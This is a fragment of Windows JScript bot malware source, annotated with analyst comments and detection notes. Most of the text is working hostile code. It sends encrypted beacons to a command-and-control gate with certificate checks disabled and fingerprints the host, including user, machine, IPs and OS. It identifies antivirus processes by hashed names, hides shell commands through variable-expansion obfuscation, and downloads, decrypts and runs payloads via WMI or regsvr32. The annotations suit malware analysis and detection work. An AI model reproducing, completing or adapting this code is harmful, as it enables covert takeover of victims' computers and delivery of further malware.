        if (SYSTEM === 0 && method === 0) {
            return check_Host(1);
        } else {
            return false;
        }
    }
    // Synchronous request: this handler completes inside send().
    conz1.onreadystatechange = function() {
        if (conz1.readyState === 4) {
            if (conz1.status === 200) {
                Temp90 = conz1.responseText;
                if (Temp90) {
                    if (cLength(Temp90, 8, 32) === true) {
                        Resp = true;
                    }
                }
            }
        }
    };
    var keynow = rStr(2);                 // per-request key suffix, sent in clear after the ciphertext
    var rNow = rInt(8, 32);
    var not_unique = "|" + rStr(rNow) + "|";
    var xCrypted = zzzz4(Rkey + keynow, not_unique) + keynow;
    var encoded = base91_encode(xCrypted);
    if (SYSTEM === 1 || method === 1) {
        // ServerXMLHTTP only: option 2 is the ignore-server-certificate-errors flag set,
        // and 13056 presumably selects all error classes — so the beacon tolerates an
        // untrusted/mismatched TLS certificate (TLS inspection of this traffic is feasible).
        try {
            conz1.setOption(2, 13056);
        } catch (e411) {
            g11 = 1;
        }
    }
    try {
        conz1.send(encoded);
    } catch (e4) {
        if (SYSTEM === 0 && method === 0) {
            return check_Host(1);
        } else {
            return false;
        }
    }
    return Resp;
}
// Fills the global `table` with the 256-entry CRC-32 lookup table for the
// reflected polynomial 0xEDB88320 (3988292384). Must run before b_crc32();
// in this excerpt cAV() calls it on every invocation.
function crc32_init() {
    var i = 0;
    var tmp = 0;
    var k = 0;
    while (i < 256) {
        tmp = i;
        k = 0;
        while (k < 8) {
            tmp = tmp & 1 ? 3988292384 ^ tmp >>> 1 : tmp >>> 1;
            k += 1;
        }
        table[i] = tmp;
        i += 1;
    }
}
// Standard CRC-32 (init 0xFFFFFFFF, final XOR) over the low byte of each code unit
// of `str`, returned as an unsigned 32-bit number. Relies on `table` having been
// filled by crc32_init(). cAV() uses it to compare lower-cased process names
// against a hard-coded list of hashes without embedding the names themselves.
function b_crc32(str) {
    var crc = -1;
    var iTop = str.length;
    var i = 0;
    while (i < iTop) {
        crc = (crc >>> 8) ^ table[(crc ^ str.charCodeAt(i)) & 0xFF];
        i += 1;
    }
    return (crc ^ (-1)) >>> 0;
}
function cAV() {
972
var pList = [];
973
var i = 0;
974
var rAV = "";
975
var ExeNow = "";
976
var fso;
977
var file4;
978
var vStr = "";
979
var tList = [];
980
var tL2 = [];
981
var rExe = "";
982
var x;
983
var pNow = "";
984
var cNow = 0;
985
var rFile = "";
986
var wInternal;
987
var itemNow;
988
var v1 = "a";
989
var v2 = "b";
990
var v3 = "c";
991
var v4 = "d";
992
var v5 = "e";
993
var v6 = "f";
994
var v7 = "g";
995
var v8 = "h";
996
var v9 = "i";
997
var v10 = "j";
998
var v11 = "k";
999
var v12 = "l";
1000
var v13 = "m";
1001
var v14 = "n";
1002
var v15 = "o";
1003
var v16 = "p";
1004
var v17 = "q";
1005
var v18 = "r";
1006
var v19 = "s";
1007
var v20 = "t";
1008
var v21 = "u";
1009
var v22 = "v";
1010
var v23 = "w";
1011
var v24 = "x";
1012
var v25 = "y";
1013
var v26 = "z";
1014
var v27 = "1";
1015
var v28 = "2";
1016
var v29 = "3";
1017
var v30 = "4";
1018
var v31 = "5";
1019
var ret7;
1020
try {
1021
var loc = obj("WbemScripting.SWbemLocator");
1022
var svc = loc.ConnectServer(".", "root\\cimv2");
1023
var coll = svc.ExecQuery("SELECT * FROM Win32_Process");
1024
var items = new Enumerator(coll);
1025
while (items.atEnd() === false) {
1026
itemNow = items.item();
1027
if (itemNow) {
1028
ExeNow = itemNow.Name;
1029
tList.push(ExeNow);
1030
}
1031
items.moveNext();
1032
}
1033
ExeNow = "";
1034
wInternal = 1;
1035
} catch (ave1) {
1036
rFile = xTmp + tempNow();
1037
var r1 = rStr(rInt(4, 8));
1038
ret7 = wmi_command('cmd /v /c set "' + r1 + '=s" && ta!' + r1 + '!kli!' + r1 + '!t /NH /FO C!' + r1 + '!V > "' + rFile + '"', 1);
1039
if (ret7 == false) {
1040
dFile(rFile);
1041
return "0";
1042
}
1043
wInternal = 0;
1044
}
1045
if (wInternal == 0) {
1046
try {
1047
if (fexist(rFile) === true) {
1048
fso = obj("Scripting.FileSystemObject");
1049
file4 = fso.OpenTextFile(rFile, 1, 0);
1050
if (file4.AtEndOfStream === false) {
1051
vStr = file4.ReadAll();
1052
}
1053
file4.Close();
1054
dFile(rFile);
1055
} else {
1056
return "0";
1057
}
1058
} catch (eav1) {
1059
return "0";
1060
}
1061
try {
1062
if (vStr) {
1063
tList = vStr.split(/\r?\n/);
1064
} else {
1065
return "0";
1066
}
1067
} catch (eav3) {
1068
return "0";
1069
}
1070
}
1071
try {
1072
if (tList.length <= 5) {
1073
return "0";
1074
}
1075
crc32_init();
1076
i = 0;
1077
do {
1078
if (wInternal == 1) {
1079
rExe = tList[i];
1080
} else {
1081
ExeNow = tList[i];
1082
tL2 = ExeNow.split('"');
1083
rExe = tL2[1];
1084
}
1085
if ((rExe) && (rExe.length >= 4)) {
1086
cNow = b_crc32(rExe.toLowerCase());
1087
if (cNow && cNow !== 3377271179 && cNow !== 3106260013 && cNow !== 902868994 && cNow !== 74504709 && cNow !== 3187896405 && cNow !== 1036299297 && cNow !== 2619149582 && cNow !== 3034799888 && cNow !== 3286091477 && cNow !== 1025985939 && cNow !== 437725275 && cNow !== 3520973717 && cNow !== 81053313 && cNow !== 3027707000 && cNow !== 1251423904 && cNow !== 3867582538 && cNow !== 961692650 && cNow !== 1073290778 && cNow !== 3024872867 && cNow !== 1105170146 && cNow !== 333580186 && cNow !== 2027685132 && cNow !== 4097471352) {
1088
pList.push(cNow);
1089
}
1090
}
1091
rExe = "";
1092
i += 1;
1093
} while (i < tList.length);
1094
tList = [];
1095
tL2 = [];
1096
} catch (eav3) {
1097
return "0";
1098
}
1099
if (pList.length >= 5) {
1100
cNow = 0;
1101
x = 0;
1102
do {
1103
pNow = pList[x];
1104
switch (pNow) {
1105
case 4167611121:
1106
if (rAV.indexOf(v1) === -1) {
1107
rAV += v1 + ",";
1108
}
1109
break;
1110
case 877060326:
1111
if (rAV.indexOf(v1) === -1) {
1112
rAV += v1 + ",";
1113
}
1114
break;
1115
case 305523985:
1116
if (rAV.indexOf(v2) === -1) {
1117
rAV += v2 + ",";
1118
}
1119
break;
1120
case 800732934:
1121
if (rAV.indexOf(v2) === -1) {
1122
rAV += v2 + ",";
1123
}
1124
break;
1125
case 1964687411:
1126
if (rAV.indexOf(v2) === -1) {
1127
rAV += v2 + ",";
1128
}
1129
break;
1130
case 2528998123:
1131
if (rAV.indexOf(v2) === -1) {
1132
rAV += v2 + ",";
1133
}
1134
break;
1135
case 536747592:
1136
if (rAV.indexOf(v4) === -1) {
1137
rAV += v4 + ",";
1138
}
1139
break;
1140
case 184741780:
1141
if (rAV.indexOf(v4) === -1) {
1142
rAV += v4 + ",";
1143
}
1144
break;
1145
case 242152363:
1146
if (rAV.indexOf(v5) === -1) {
1147
rAV += v5 + ",";
1148
}
1149
break;
1150
case 3038770874:
1151
if (rAV.indexOf(v6) === -1) {
1152
rAV += v6 + ",";
1153
}
1154
break;
1155
case 1863628361:
1156
if (rAV.indexOf(v6) === -1) {
1157
rAV += v6 + ",";
1158
}
1159
break;
1160
case 1779566114:
1161
if (rAV.indexOf(v6) === -1) {
1162
rAV += v6 + ",";
1163
}
1164
break;
1165
case 19515369:
1166
if (rAV.indexOf(v7) === -1) {
1167
rAV += v7 + ",";
1168
}
1169
break;
1170
case 2229870333:
1171
if (rAV.indexOf(v7) === -1) {
1172
rAV += v7 + ",";
1173
}
1174
break;
1175
case 4056687588:
1176
if (rAV.indexOf(v7) === -1) {
1177
rAV += v7 + ",";
1178
}
1179
break;
1180
case 1081013580:
1181
if (rAV.indexOf(v7) === -1) {
1182
rAV += v7 + ",";
1183
}
1184
break;
1185
case 238643926:
1186
if (rAV.indexOf(v8) === -1) {
1187
rAV += v8 + ",";
1188
}
1189
break;
1190
case 3103805340:
1191
if (rAV.indexOf(v8) === -1) {
1192
rAV += v8 + ",";
1193
}
1194
break;
1195
case 3898904431:
1196
if (rAV.indexOf(v9) === -1) {
1197
rAV += v9 + ",";
1198
}
1199
break;
1200
case 2447720335:
1201
if (rAV.indexOf(v9) === -1) {
1202
rAV += v9 + ",";
1203
}
1204
break;
1205
case 1474450799:
1206
if (rAV.indexOf(v9) === -1) {
1207
rAV += v9 + ",";
1208
}
1209
break;
1210
case 1087054291:
1211
if (rAV.indexOf(v10) === -1) {
1212
rAV += v10 + ",";
1213
}
1214
break;
1215
case 3237881663:
1216
if (rAV.indexOf(v11) === -1) {
1217
rAV += v11 + ",";
1218
}
1219
break;
1220
case 2928704260:
1221
if (rAV.indexOf(v12) === -1) {
1222
rAV += v12 + ",";
1223
}
1224
break;
1225
case 3457522114:
1226
if (rAV.indexOf(v13) === -1) {
1227
rAV += v13 + ",";
1228
}
1229
break;
1230
case 1864254150:
1231
if (rAV.indexOf(v13) === -1) {
1232
rAV += v13 + ",";
1233
}
1234
break;
1235
case 2866464079:
1236
if (rAV.indexOf(v13) === -1) {
1237
rAV += v13 + ",";
1238
}
1239
break;
1240
case 3233790880:
1241
if (rAV.indexOf(v14) === -1) {
1242
rAV += v14 + ",";
1243
}
1244
break;
1245
case 3314468719:
1246
if (rAV.indexOf(v15) === -1) {
1247
rAV += v15 + ",";
1248
}
1249
break;
1250
case 2432672291:
1251
if (rAV.indexOf(v16) === -1) {
1252
rAV += v16 + ",";
1253
}
1254
break;
1255
case 332293705:
1256
if (rAV.indexOf(v17) === -1) {
1257
rAV += v17 + ",";
1258
}
1259
break;
1260
case 3917603449:
1261
if (rAV.indexOf(v17) === -1) {
1262
rAV += v17 + ",";
1263
}
1264
break;
1265
case 3707949399:
1266
if (rAV.indexOf(v17) === -1) {
1267
rAV += v17 + ",";
1268
}
1269
break;
1270
case 61053860:
1271
if (rAV.indexOf(v17) === -1) {
1272
rAV += v17 + ",";
1273
}
1274
break;
1275
case 1570161171:
1276
if (rAV.indexOf(v18) === -1) {
1277
rAV += v18 + ",";
1278
}
1279
break;
1280
case 1146093233:
1281
if (rAV.indexOf(v19) === -1) {
1282
rAV += v19 + ",";
1283
}
1284
break;
1285
case 3758109384:
1286
if (rAV.indexOf(v20) === -1) {
1287
rAV += v20 + ",";
1288
}
1289
break;
1290
case 3601606648:
1291
if (rAV.indexOf(v21) === -1) {
1292
rAV += v21 + ",";
1293
}
1294
break;
1295
case 2544592543:
1296
if (rAV.indexOf(v22) === -1) {
1297
rAV += v22 + ",";
1298
}
1299
break;
1300
case 2514406649:
1301
if (rAV.indexOf(v23) === -1) {
1302
rAV += v23 + ",";
1303
}
1304
break;
1305
case 807313958:
1306
if (rAV.indexOf(v24) === -1) {
1307
rAV += v24 + ",";
1308
}
1309
break;
1310
case 2213386403:
1311
if (rAV.indexOf(v25) === -1) {
1312
rAV += v25 + ",";
1313
}
1314
break;
1315
case 2880445231:
1316
if (rAV.indexOf(v26) === -1) {
1317
rAV += v26 + ",";
1318
}
1319
break;
1320
case 2394653102:
1321
if (rAV.indexOf(v27) === -1) {
1322
rAV += v27 + ",";
1323
}
1324
break;
1325
case 1164644511:
1326
if (rAV.indexOf(v3) === -1) {
1327
rAV += v3 + ",";
1328
}
1329
break;
1330
case 1683252343:
1331
if (rAV.indexOf(v28) === -1) {
1332
rAV += v28 + ",";
1333
}
1334
break;
1335
case 1460978182:
1336
if (rAV.indexOf(v29) === -1) {
1337
rAV += v29 + ",";
1338
}
1339
break;
1340
case 3576979024:
1341
if (rAV.indexOf(v30) === -1) {
1342
rAV += v30 + ",";
1343
}
1344
break;
1345
case 3540381638:
1346
if (rAV.indexOf(v31) === -1) {
1347
rAV += v31 + ",";
1348
}
1349
break;
1350
case 4028018370:
1351
if (rAV.indexOf(v31) === -1) {
1352
rAV += v31 + ",";
1353
}
1354
break;
1355
}
1356
x += 1;
1357
} while (x < pList.length);
1358
if (rAV.length >= 1) {
1359
if (rAV.substring(rAV.length - 1) === ",") {
1360
rAV = rAV.substring(0, rAV.length - 1);
1361
}
1362
} else {
1363
rAV = "0";
1364
}
1365
} else {
1366
rAV = "0";
1367
}
1368
pList = [];
1369
if (rAV) {
1370
return rAV;
1371
} else {
1372
return "0";
1373
}
1374
}
// Hex dump of the code units of `str` (after toString()), concatenated without
// separators or zero padding — so a code unit < 0x10 contributes a single hex
// digit and the output is not unambiguously reversible. Returns "0" for a falsy
// input; if the conversion throws, returns the stringified (or raw) input instead.
function ascii_to_hex(str) {
    var arr1 = [];
    var hex1;
    var str1;
    if (!str) {
        return "0";
    }
    try {
        str1 = str.toString();
        var n = 0;
        var count1 = str1.length;
        do {
            hex1 = Number(str1.charCodeAt(n)).toString(16);
            arr1.push(hex1);
            n = n + 1;
        } while (n < count1);
        return arr1.join('');
    } catch (e93) {
        try {
            str1 = str.toString();
        } catch (e93) {
            str1 = str;
        }
        if (str1) {
            return str1;
        } else {
            return str;
        }
    }
}
// Host-fingerprint component: the creation timestamp of C:\Windows\notepad.exe
// (fallback: winhlp32.exe) as a stand-in for the OS install date. The Date object
// is passed to ascii_to_hex(), which stringifies it first, so the result is the
// hex of the locale date string, not of a numeric timestamp. Returns "0" when both
// files are unreadable or no date was obtained.
function os_hwid_install_date() {
    var objFSO1;
    var objFile;
    var dt1;
    try {
        objFSO1 = obj("Scripting.FileSystemObject");
        objFile = objFSO1.GetFile("C:\\Windows\\notepad.exe");
        dt1 = new Date(objFile.DateCreated);
    } catch (e96) {
        try {
            objFSO1 = obj("Scripting.FileSystemObject");
            objFile = objFSO1.GetFile("C:\\Windows\\winhlp32.exe");
            dt1 = new Date(objFile.DateCreated);
        } catch (e94) {
            return "0";
        }
    }
    if (!dt1) {
        return "0";
    }
    return ascii_to_hex(dt1);
}
// OS version fingerprint without spawning a command: copies notepad.exe (fallback
// winhlp32.exe) into xTmp, reads its file version with FSO.GetFileVersion, deletes
// the copy, then matches the version string against "major.minor." prefixes.
// Returns the matched prefix ("5.1.", "6.0.", ..., "10.0.", "5.2.") and stores the
// remainder after it in the global `Build`; returns "0" on any failure or no match.
// Note: the prefix test is an unanchored indexOf, and the check order is
// 5.1, 6.0, 6.1, 6.2, 6.3, 10.0, 5.2 — the first hit wins.
// Why a copy is made before GetFileVersion is not stated in the code — presumably
// to avoid touching the original in place; confirm before relying on it.
function os_version_no_cmd() {
    var objFSO;
    var verzz;
    var Vers1 = "5.1.";
    var Vers2 = "5.2.";
    var Vers3 = "6.0.";
    var Vers4 = "6.1.";
    var Vers5 = "6.2.";
    var Vers6 = "6.3.";
    var Vers7 = "10.0.";
    var xNow = "";
    var vSplit = [];
    var Temp1;
    var savTo = "";
    try {
        objFSO = obj("Scripting.FileSystemObject");
        savTo = xTmp + tempNow();
        objFSO.CopyFile("C:\\Windows\\notepad.exe", savTo);
        verzz = objFSO.GetFileVersion(savTo);
        dFile(savTo);
        savTo = "";
    } catch (e99) {
        try {
            objFSO = obj("Scripting.FileSystemObject");
            savTo = xTmp + tempNow();
            objFSO.CopyFile("C:\\Windows\\winhlp32.exe", savTo);
            verzz = objFSO.GetFileVersion(savTo);
            dFile(savTo);
            savTo = "";
        } catch (e98) {
            return "0";
        }
    }
    if (!verzz) {
        return "0";
    }
    try {
        if (verzz.indexOf(Vers1) !== -1) {
            xNow = Vers1;
        }
        if (!xNow) {
            if (verzz.indexOf(Vers3) !== -1) {
                xNow = Vers3;
            }
        }
        if (!xNow) {
            if (verzz.indexOf(Vers4) !== -1) {
                xNow = Vers4;
            }
        }
        if (!xNow) {
            if (verzz.indexOf(Vers5) !== -1) {
                xNow = Vers5;
            }
        }
        if (!xNow) {
            if (verzz.indexOf(Vers6) !== -1) {
                xNow = Vers6;
            }
        }
        if (!xNow) {
            if (verzz.indexOf(Vers7) !== -1) {
                xNow = Vers7;
            }
        }
        if (!xNow) {
            if (verzz.indexOf(Vers2) !== -1) {
                xNow = Vers2;
            }
        }
        // Clearing the literals has no functional effect; kept as in the sample.
        Vers1 = "";
        Vers2 = "";
        Vers3 = "";
        Vers4 = "";
        Vers5 = "";
        Vers6 = "";
        Vers7 = "";
        if (xNow) {
            // Everything after the matched prefix becomes the build number.
            vSplit = verzz.split(xNow);
            if (vSplit[1]) {
                Temp1 = vSplit[1];
                if (Temp1) {
                    Build = Temp1;
                } else {
                    Build = "0";
                }
            }
            return xNow;
        } else {
            return "0";
        }
    } catch (e99) {
        return "0";
    }
}
function local_ip2() {
// Collects the host's local IP addresses for the beacon header built in bot_header().
// Primary path: a WMI query of Win32_NetworkAdapterConfiguration, taking IPAddress(0)
// of every IP-enabled adapter.
// Fallback path (any WMI failure): runs, via wmi_command, a cmd.exe pipeline whose
// command names are reassembled from a delayed-expansion variable (!r1! = "I"), i.e.
// "Ipconfig | fIndstr /R /C:"IPv4 Address"" -- so "ipconfig"/"findstr" never appear
// literally in the command line; output is redirected to a temp file which is then
// parsed and deleted.
// Returns a comma-separated list of unique addresses (excluding "0.0.0.0"), or "0".
// Detection note: cmd.exe started with "/v /c" from a script host and writing to
// %TMP%, and a WMI ExecQuery from the same host, are both observable events.
1527
var vStr = "";
1528
var fso;
1529
var file2;
1530
var xRet = "";
1531
var xNow = "";
1532
var vSplit = [];
1533
var xSplit = [];
1534
var i;
1535
var rFile = "";
1536
var xipnow = "";
1537
var ipsList = [];
1538
var itemNow2;
1539
var ret5;
1540
try {
1541
var loc2 = obj("WbemScripting.SWbemLocator");
1542
var svc2 = loc2.ConnectServer(".", "root\\cimv2");
1543
var col2 = svc2.ExecQuery("SELECT IPAddress FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = True");
1544
var items2 = new Enumerator(col2);
1545
while (items2.atEnd() === false) {
1546
itemNow2 = items2.item();
1547
if (itemNow2) {
1548
// Only the first address of each adapter is taken.
xipnow = itemNow2.IPAddress(0);
1549
if (xipnow) {
1550
ipsList.push(xipnow);
1551
}
1552
}
1553
items2.moveNext();
1554
}
1555
} catch (eip1) {
1556
try {
1557
rFile = xTmp + tempNow();
1558
// r1 is a random 4-8 char variable name used for the delayed-expansion trick below.
var r1 = rStr(rInt(4, 8));
1559
ret5 = wmi_command('cmd /v /c set "' + r1 + '=I" && !' + r1 + '!pconf!' + r1 + '!g | f!' + r1 + '!ndstr /R /C:"!' + r1 + '!Pv4 Address" > "' + rFile + '"', 1);
1560
r1 = "";
1561
// Loose equality: ret5 is whatever wmi_command returns (defined elsewhere).
if (ret5 == false) {
1562
dFile(rFile);
1563
return "0";
1564
}
1565
if (fexist(rFile) === true) {
1566
fso = obj("Scripting.FileSystemObject");
1567
file2 = fso.OpenTextFile(rFile, 1, 0);
1568
if (file2.AtEndOfStream === false) {
1569
vStr = file2.ReadAll();
1570
}
1571
file2.Close();
1572
dFile(rFile);
1573
} else {
1574
return "0";
1575
}
1576
if (vStr) {
1577
vSplit = vStr.split(/\r?\n/);
1578
} else {
1579
return "0";
1580
}
1581
// Always true (length is never negative); the else branch is unreachable.
if (vSplit.length >= 0) {
1582
i = 0;
1583
do {
1584
xNow = vSplit[i];
1585
if (xNow) {
1586
// findstr output lines look like "   IPv4 Address. . . : x.x.x.x"; the
// address is the part after ": ".
xSplit = xNow.split(": ");
1587
if (xSplit.length === 2) {
1588
xipnow = xSplit[1];
1589
if (xipnow) {
1590
ipsList.push(xipnow);
1591
}
1592
}
1593
}
1594
i += 1;
1595
} while (i < vSplit.length);
1596
vSplit = [];
1597
xSplit = [];
1598
} else {
1599
return "0";
1600
}
1601
} catch (e891) {
1602
return "0";
1603
}
1604
}
1605
xipnow = "";
1606
i = 0;
1607
try {
1608
if (ipsList.length <= 0) {
1609
return "0";
1610
}
1611
do {
1612
xipnow = ipsList[i];
1613
// Dedup via substring search on the accumulated string, and drop 0.0.0.0.
if (xipnow && xRet.indexOf(xipnow) === -1 && xipnow !== "0.0.0.0") {
1614
xRet = xRet + xipnow + ",";
1615
}
1616
i += 1;
1617
} while (i < ipsList.length);
1618
// Strip the trailing comma.
xRet = xRet.substring(0, xRet.length - 1);
1619
if (xRet) {
1620
return xRet;
1621
} else {
1622
return "0";
1623
}
1624
} catch (eip2) {
1625
return "0";
1626
}
1627
}
1628
1629
function os_product_no_wmi() {
// Classifies the OS product type without WMI by reading
// HKLM\SYSTEM\CurrentControlSet\Control\ProductOptions\ProductType via WScript.Shell.
// Returns "1" for "WinNT" (workstation), "3" for any other value of length >= 3
// (i.e. server SKUs), and "1" on short values or any error.
// The result becomes one field of the beacon header (bot_header).
1630
var key1 = "HKLM\\SYSTEM\\CurrentControlSet\\Control\\ProductOptions\\ProductType";
1631
var reg1;
1632
var rdata1 = "";
1633
try {
1634
reg1 = obj("WScript.Shell");
1635
rdata1 = reg1.RegRead(key1);
1636
if (rdata1.length >= 3) {
1637
// Loose equality; RegRead returns a string for REG_SZ.
if (rdata1 == "WinNT") {
1638
return "1";
1639
} else {
1640
return "3";
1641
}
1642
} else {
1643
return "1";
1644
}
1645
} catch (eos5) {
1646
// Default to "workstation" when the key cannot be read.
return "1";
1647
}
1648
}
1649
1650
function bot_header() {
// Builds the pipe-delimited host fingerprint that every beacon sends (cached in
// PreserveH by main()). Field order, as concatenated below:
//   |<os_hwid_install_date()>|<cAV()>|<user>|<pc>|<os version>|<product type>
//   |<Build>|<is 64-bit: "1"/"0">|<local IPs>|<BV (bot version, "6.6a" per the header)>
// Every collector is defined elsewhere in the file; each missing value is replaced
// by "0". Side effects: resets the global `table` to [] after cAV(), sets Build to
// "0" if os_version_no_cmd() left it empty, and clears the global BV after use.
// Detection note: the header is the only thing sent on an idle beacon, so the
// "|"-delimited, fixed-order layout is a usable network signature once decoded.
1651
var vParti = "";
1652
var osf = "";
1653
var vNTvers = "";
1654
var vlIP = "";
1655
var b2 = "";
1656
var av11 = "";
1657
var sRet = "";
1658
var uUnicode = "";
1659
var pUnicode = "";
1660
// os_version_no_cmd() (defined above) also populates the global Build as a side effect.
osf = os_version_no_cmd();
1661
if (!osf) {
1662
osf = "0";
1663
}
1664
if (!Build) {
1665
Build = "0";
1666
}
1667
vlIP = local_ip2();
1668
if (!vlIP) {
1669
vlIP = "0";
1670
}
1671
if (myBits() === "64") {
1672
b2 = "1";
1673
} else {
1674
b2 = "0";
1675
}
1676
vNTvers = os_product_no_wmi();
1677
if (!vNTvers) {
1678
vNTvers = "0";
1679
}
1680
// cAV() is defined elsewhere; the name suggests an AV-product enumeration -- confirm.
av11 = cAV();
1681
table = [];
1682
if (!av11) {
1683
av11 = "0";
1684
}
1685
vParti = os_hwid_install_date();
1686
if (!vParti) {
1687
vParti = "0";
1688
}
1689
// UNM / PCN are the user and computer names captured in check_inside().
uUnicode = remove_non_ascii(UNM);
1690
if (!uUnicode) {
1691
uUnicode = "0";
1692
}
1693
pUnicode = remove_non_ascii(PCN);
1694
if (!pUnicode) {
1695
pUnicode = "0";
1696
}
1697
sRet = "|" + vParti + "|" + av11 + "|" + uUnicode + "|" + pUnicode + "|" + osf + "|" + vNTvers + "|" + Build + "|" + b2 + "|" + vlIP + "|" + BV;
1698
// The version string is wiped from memory after it has been embedded once.
BV = "";
1699
return sRet;
1700
}
1701
1702
function hit_Gate(URL, POSTdata, gResponse, method) {
// Sends one synchronous HTTP POST to the C2 gate and, when gResponse === 1,
// returns the decoded reply.
//   URL        gate URL (callers pass the global Gate).
//   POSTdata   plaintext payload (beacon header or task reply).
//   gResponse  1 = parse and return the response body; anything else = fire and forget.
//   method     0 = use `con` (Msxml2.XMLHTTP), 1 = use `xhr` (Msxml2.ServerXMLHTTP);
//              when the global SYSTEM === 1, `xhr` is always used.
// Request body: POSTdata + "|" + random padding + "|" is encrypted with zzzz4()
// (defined elsewhere) under Rkey + a fresh 2-char key, the 2-char key is appended,
// and the whole thing is base91-encoded -- nothing in the POST body is plaintext.
// Response: base91-decoded; the last 2 chars are a per-message key suffix, the rest
// is decrypted with Rkey + suffix. Empty body -> "OK"; non-200 or decode failure
// -> "gErr". Returns Resp only when gResponse === 1 (otherwise undefined).
// On open()/send() failure with SYSTEM === 0 and method === 0 it retries itself once
// with method = 1; any other failure returns "gErr".
// Detection note: a script host (wscript/cscript) making POSTs whose body is a
// base91 alphabet blob, plus the fixed gate host, are the observable indicators;
// see the setOption() call below for the TLS-validation weakness.
1703
var Resp = "";
1704
var Temp89 = "";
1705
var con4;
1706
var respzz;
1707
if (SYSTEM === 1) {
1708
con4 = xhr;
1709
} else {
1710
if (method === 1) {
1711
con4 = xhr;
1712
} else {
1713
con4 = con;
1714
}
1715
}
1716
try {
1717
// Synchronous request (third argument false).
con4.open("POST", URL, false);
1718
} catch (e10) {
1719
if (SYSTEM === 0 && method === 0) {
1720
return hit_Gate(URL, POSTdata, gResponse, 1);
1721
} else {
1722
return "gErr";
1723
}
1724
}
1725
if (gResponse === 1) {
1726
// Relies on MSXML invoking onreadystatechange during the synchronous send()
// below, so Resp is populated before the function returns -- confirm per MSXML version.
con4.onreadystatechange = function() {
1727
if (con4.readyState === 4) {
1728
if (con4.status === 200) {
1729
respzz = con4.responseText;
1730
if (respzz) {
1731
Temp89 = base91_decode(respzz);
1732
if (Temp89) {
1733
// Split: ciphertext = all but last 2 chars, KeyNow = last 2 chars.
var wo = Temp89.substr(0, Temp89.length - 2);
1734
var KeyNow = Temp89.substr(Temp89.length - 2);
1735
Resp = zzzz4(Rkey + KeyNow, wo);
1736
if (Resp) {
1737
respzz = "";
1738
} else {
1739
Resp = "gErr";
1740
}
1741
} else {
1742
Resp = "gErr";
1743
}
1744
} else {
1745
// Empty 200 response means "no task".
Resp = "OK";
1746
}
1747
} else {
1748
Resp = "gErr";
1749
}
1750
}
1751
};
1752
}
1753
var keynow = rStr(2);
1754
var rNow = rInt(8, 32);
1755
// Random-length padding makes otherwise identical beacons differ on the wire.
var not_unique = POSTdata + "|" + rStr(rNow) + "|";
1756
var xCrypted = zzzz4(Rkey + keynow, not_unique) + keynow;
1757
var encoded = base91_encode(xCrypted);
1758
var g11 = 0;
1759
if (SYSTEM === 1 || method === 1) {
1760
try {
1761
// ServerXMLHTTP only: option 2 = SXH_OPTION_IGNORE_SERVER_SSL_CERT_ERROR_FLAGS,
// 13056 (0x3300) = ignore all server certificate errors (unknown CA, wrong usage,
// CN mismatch, expired). The client therefore never validates the gate's TLS
// certificate; TLS interception at the network edge is not detected by the bot.
con4.setOption(2, 13056);
1762
} catch (e411) {
1763
// g11 records the failure but is never read afterwards.
g11 = 1;
1764
}
1765
}
1766
try {
1767
con4.send(encoded);
1768
} catch (e11) {
1769
if (SYSTEM === 0 && method === 0) {
1770
return hit_Gate(URL, POSTdata, gResponse, 1);
1771
} else {
1772
return "gErr";
1773
}
1774
}
1775
if (gResponse === 1) {
1776
return Resp;
1777
}
1778
}
1779
1780
function dExec(zURL, myKey, xPE, xEntryP) {
// Download-decrypt-execute for the "d&exec" task (see eTask).
//   zURL     URL fetched with a synchronous GET over `con` (Msxml2.XMLHTTP).
//   myKey    key passed to zzz4Bytes() (decrypt helper defined elsewhere).
//   xPE      "exe" -> written to xApp\<tempNow()> and run via wmi_command;
//            "dll" -> written to xApp\<tempExtra()>.ocx and loaded via regsvr32.exe.
//   xEntryP  regsvr32 switch selector: "1" -> " /s /i ", "2" -> " /s /n /i ",
//            "3" -> " /s /u ", anything else -> " /s /i ".
// The body is read through ADODB.Stream as text (charset 437), converted to bytes
// with tB(), decrypted, and only written to disk if mZcheck() accepts it (defined
// elsewhere; the name suggests an MZ-header check -- confirm).
// Returns "OK" or "E". Note: the `return "E"` statements inside the
// onreadystatechange callback return from the callback, not from dExec, so on those
// paths ret2 stays "" and dExec returns "" -- callers compare against "OK", so this
// still counts as failure. If xPE is neither "exe" nor "dll", Final is undefined
// and SaveToFile() is expected to throw into the ewtf1 handler.
// Detection note: a PE written under the app-data folder by a script host, followed
// by regsvr32 /s /i on a .ocx from that folder (from SysWOW64 on 64-bit hosts), is a
// high-signal process-creation sequence.
1781
var ret2 = "";
1782
var Final;
1783
var con2 = con;
1784
var binVariant;
1785
var adb;
1786
var ret6;
1787
var cCommand;
1788
var dq = '"';
1789
try {
1790
con2.open("GET", zURL, false);
1791
} catch (e16) {
1792
return "E";
1793
}
1794
con2.onreadystatechange = function() {
1795
if (con2.readyState === 4) {
1796
if (con2.status === 200) {
1797
try {
1798
adb = obj("ADODB.Stream");
1799
adb.open();
1800
// type 1 = binary: write the raw response body, then re-read it as text.
adb.type = 1;
1801
adb.write(con2.responsebody);
1802
adb.position = 0;
1803
adb.Type = 2;
1804
adb.Charset = 437;
1805
binVariant = adb.ReadText();
1806
} catch (ewtf) {
1807
// Returns from the callback only (see header comment).
return "E";
1808
}
1809
if (binVariant) {
1810
var ByteArray = tB(binVariant);
1811
var xDecrypted = zzz4Bytes(ByteArray, myKey);
1812
if (mZcheck(xDecrypted)) {
1813
if (xPE === "exe") {
1814
Final = xApp + "\\" + tempNow();
1815
}
1816
if (xPE === "dll") {
1817
Final = xApp + "\\" + tempExtra() + ".ocx";
1818
}
1819
try {
1820
// Reuse the same stream to write the decrypted bytes back out as charset-437 text.
adb.position = 0;
1821
adb.type = 2;
1822
adb.Charset = 437;
1823
adb.WriteText(tS(xDecrypted));
1824
adb.SaveToFile(Final);
1825
adb.close();
1826
} catch (ewtf1) {
1827
// Returns from the callback only (see header comment).
return "E";
1828
}
1829
if (xPE === "exe") {
1830
ret6 = wmi_command(dq + Final + dq, 0);
1831
Final = "";
1832
if (ret6 == true) {
1833
ret2 = "OK";
1834
} else {
1835
ret2 = "E";
1836
}
1837
}
1838
if (xPE === "dll") {
1839
var Mitm_exe = "regsvr32.exe";
1840
if (Final) {
1841
var path1 = myEnv("SYSTEMROOT", 0);
1842
// 32-bit regsvr32 is chosen on 64-bit hosts (the dropped module is presumably 32-bit).
if (myBits() === "64") {
1843
path1 += "\\SysWOW64\\" + Mitm_exe;
1844
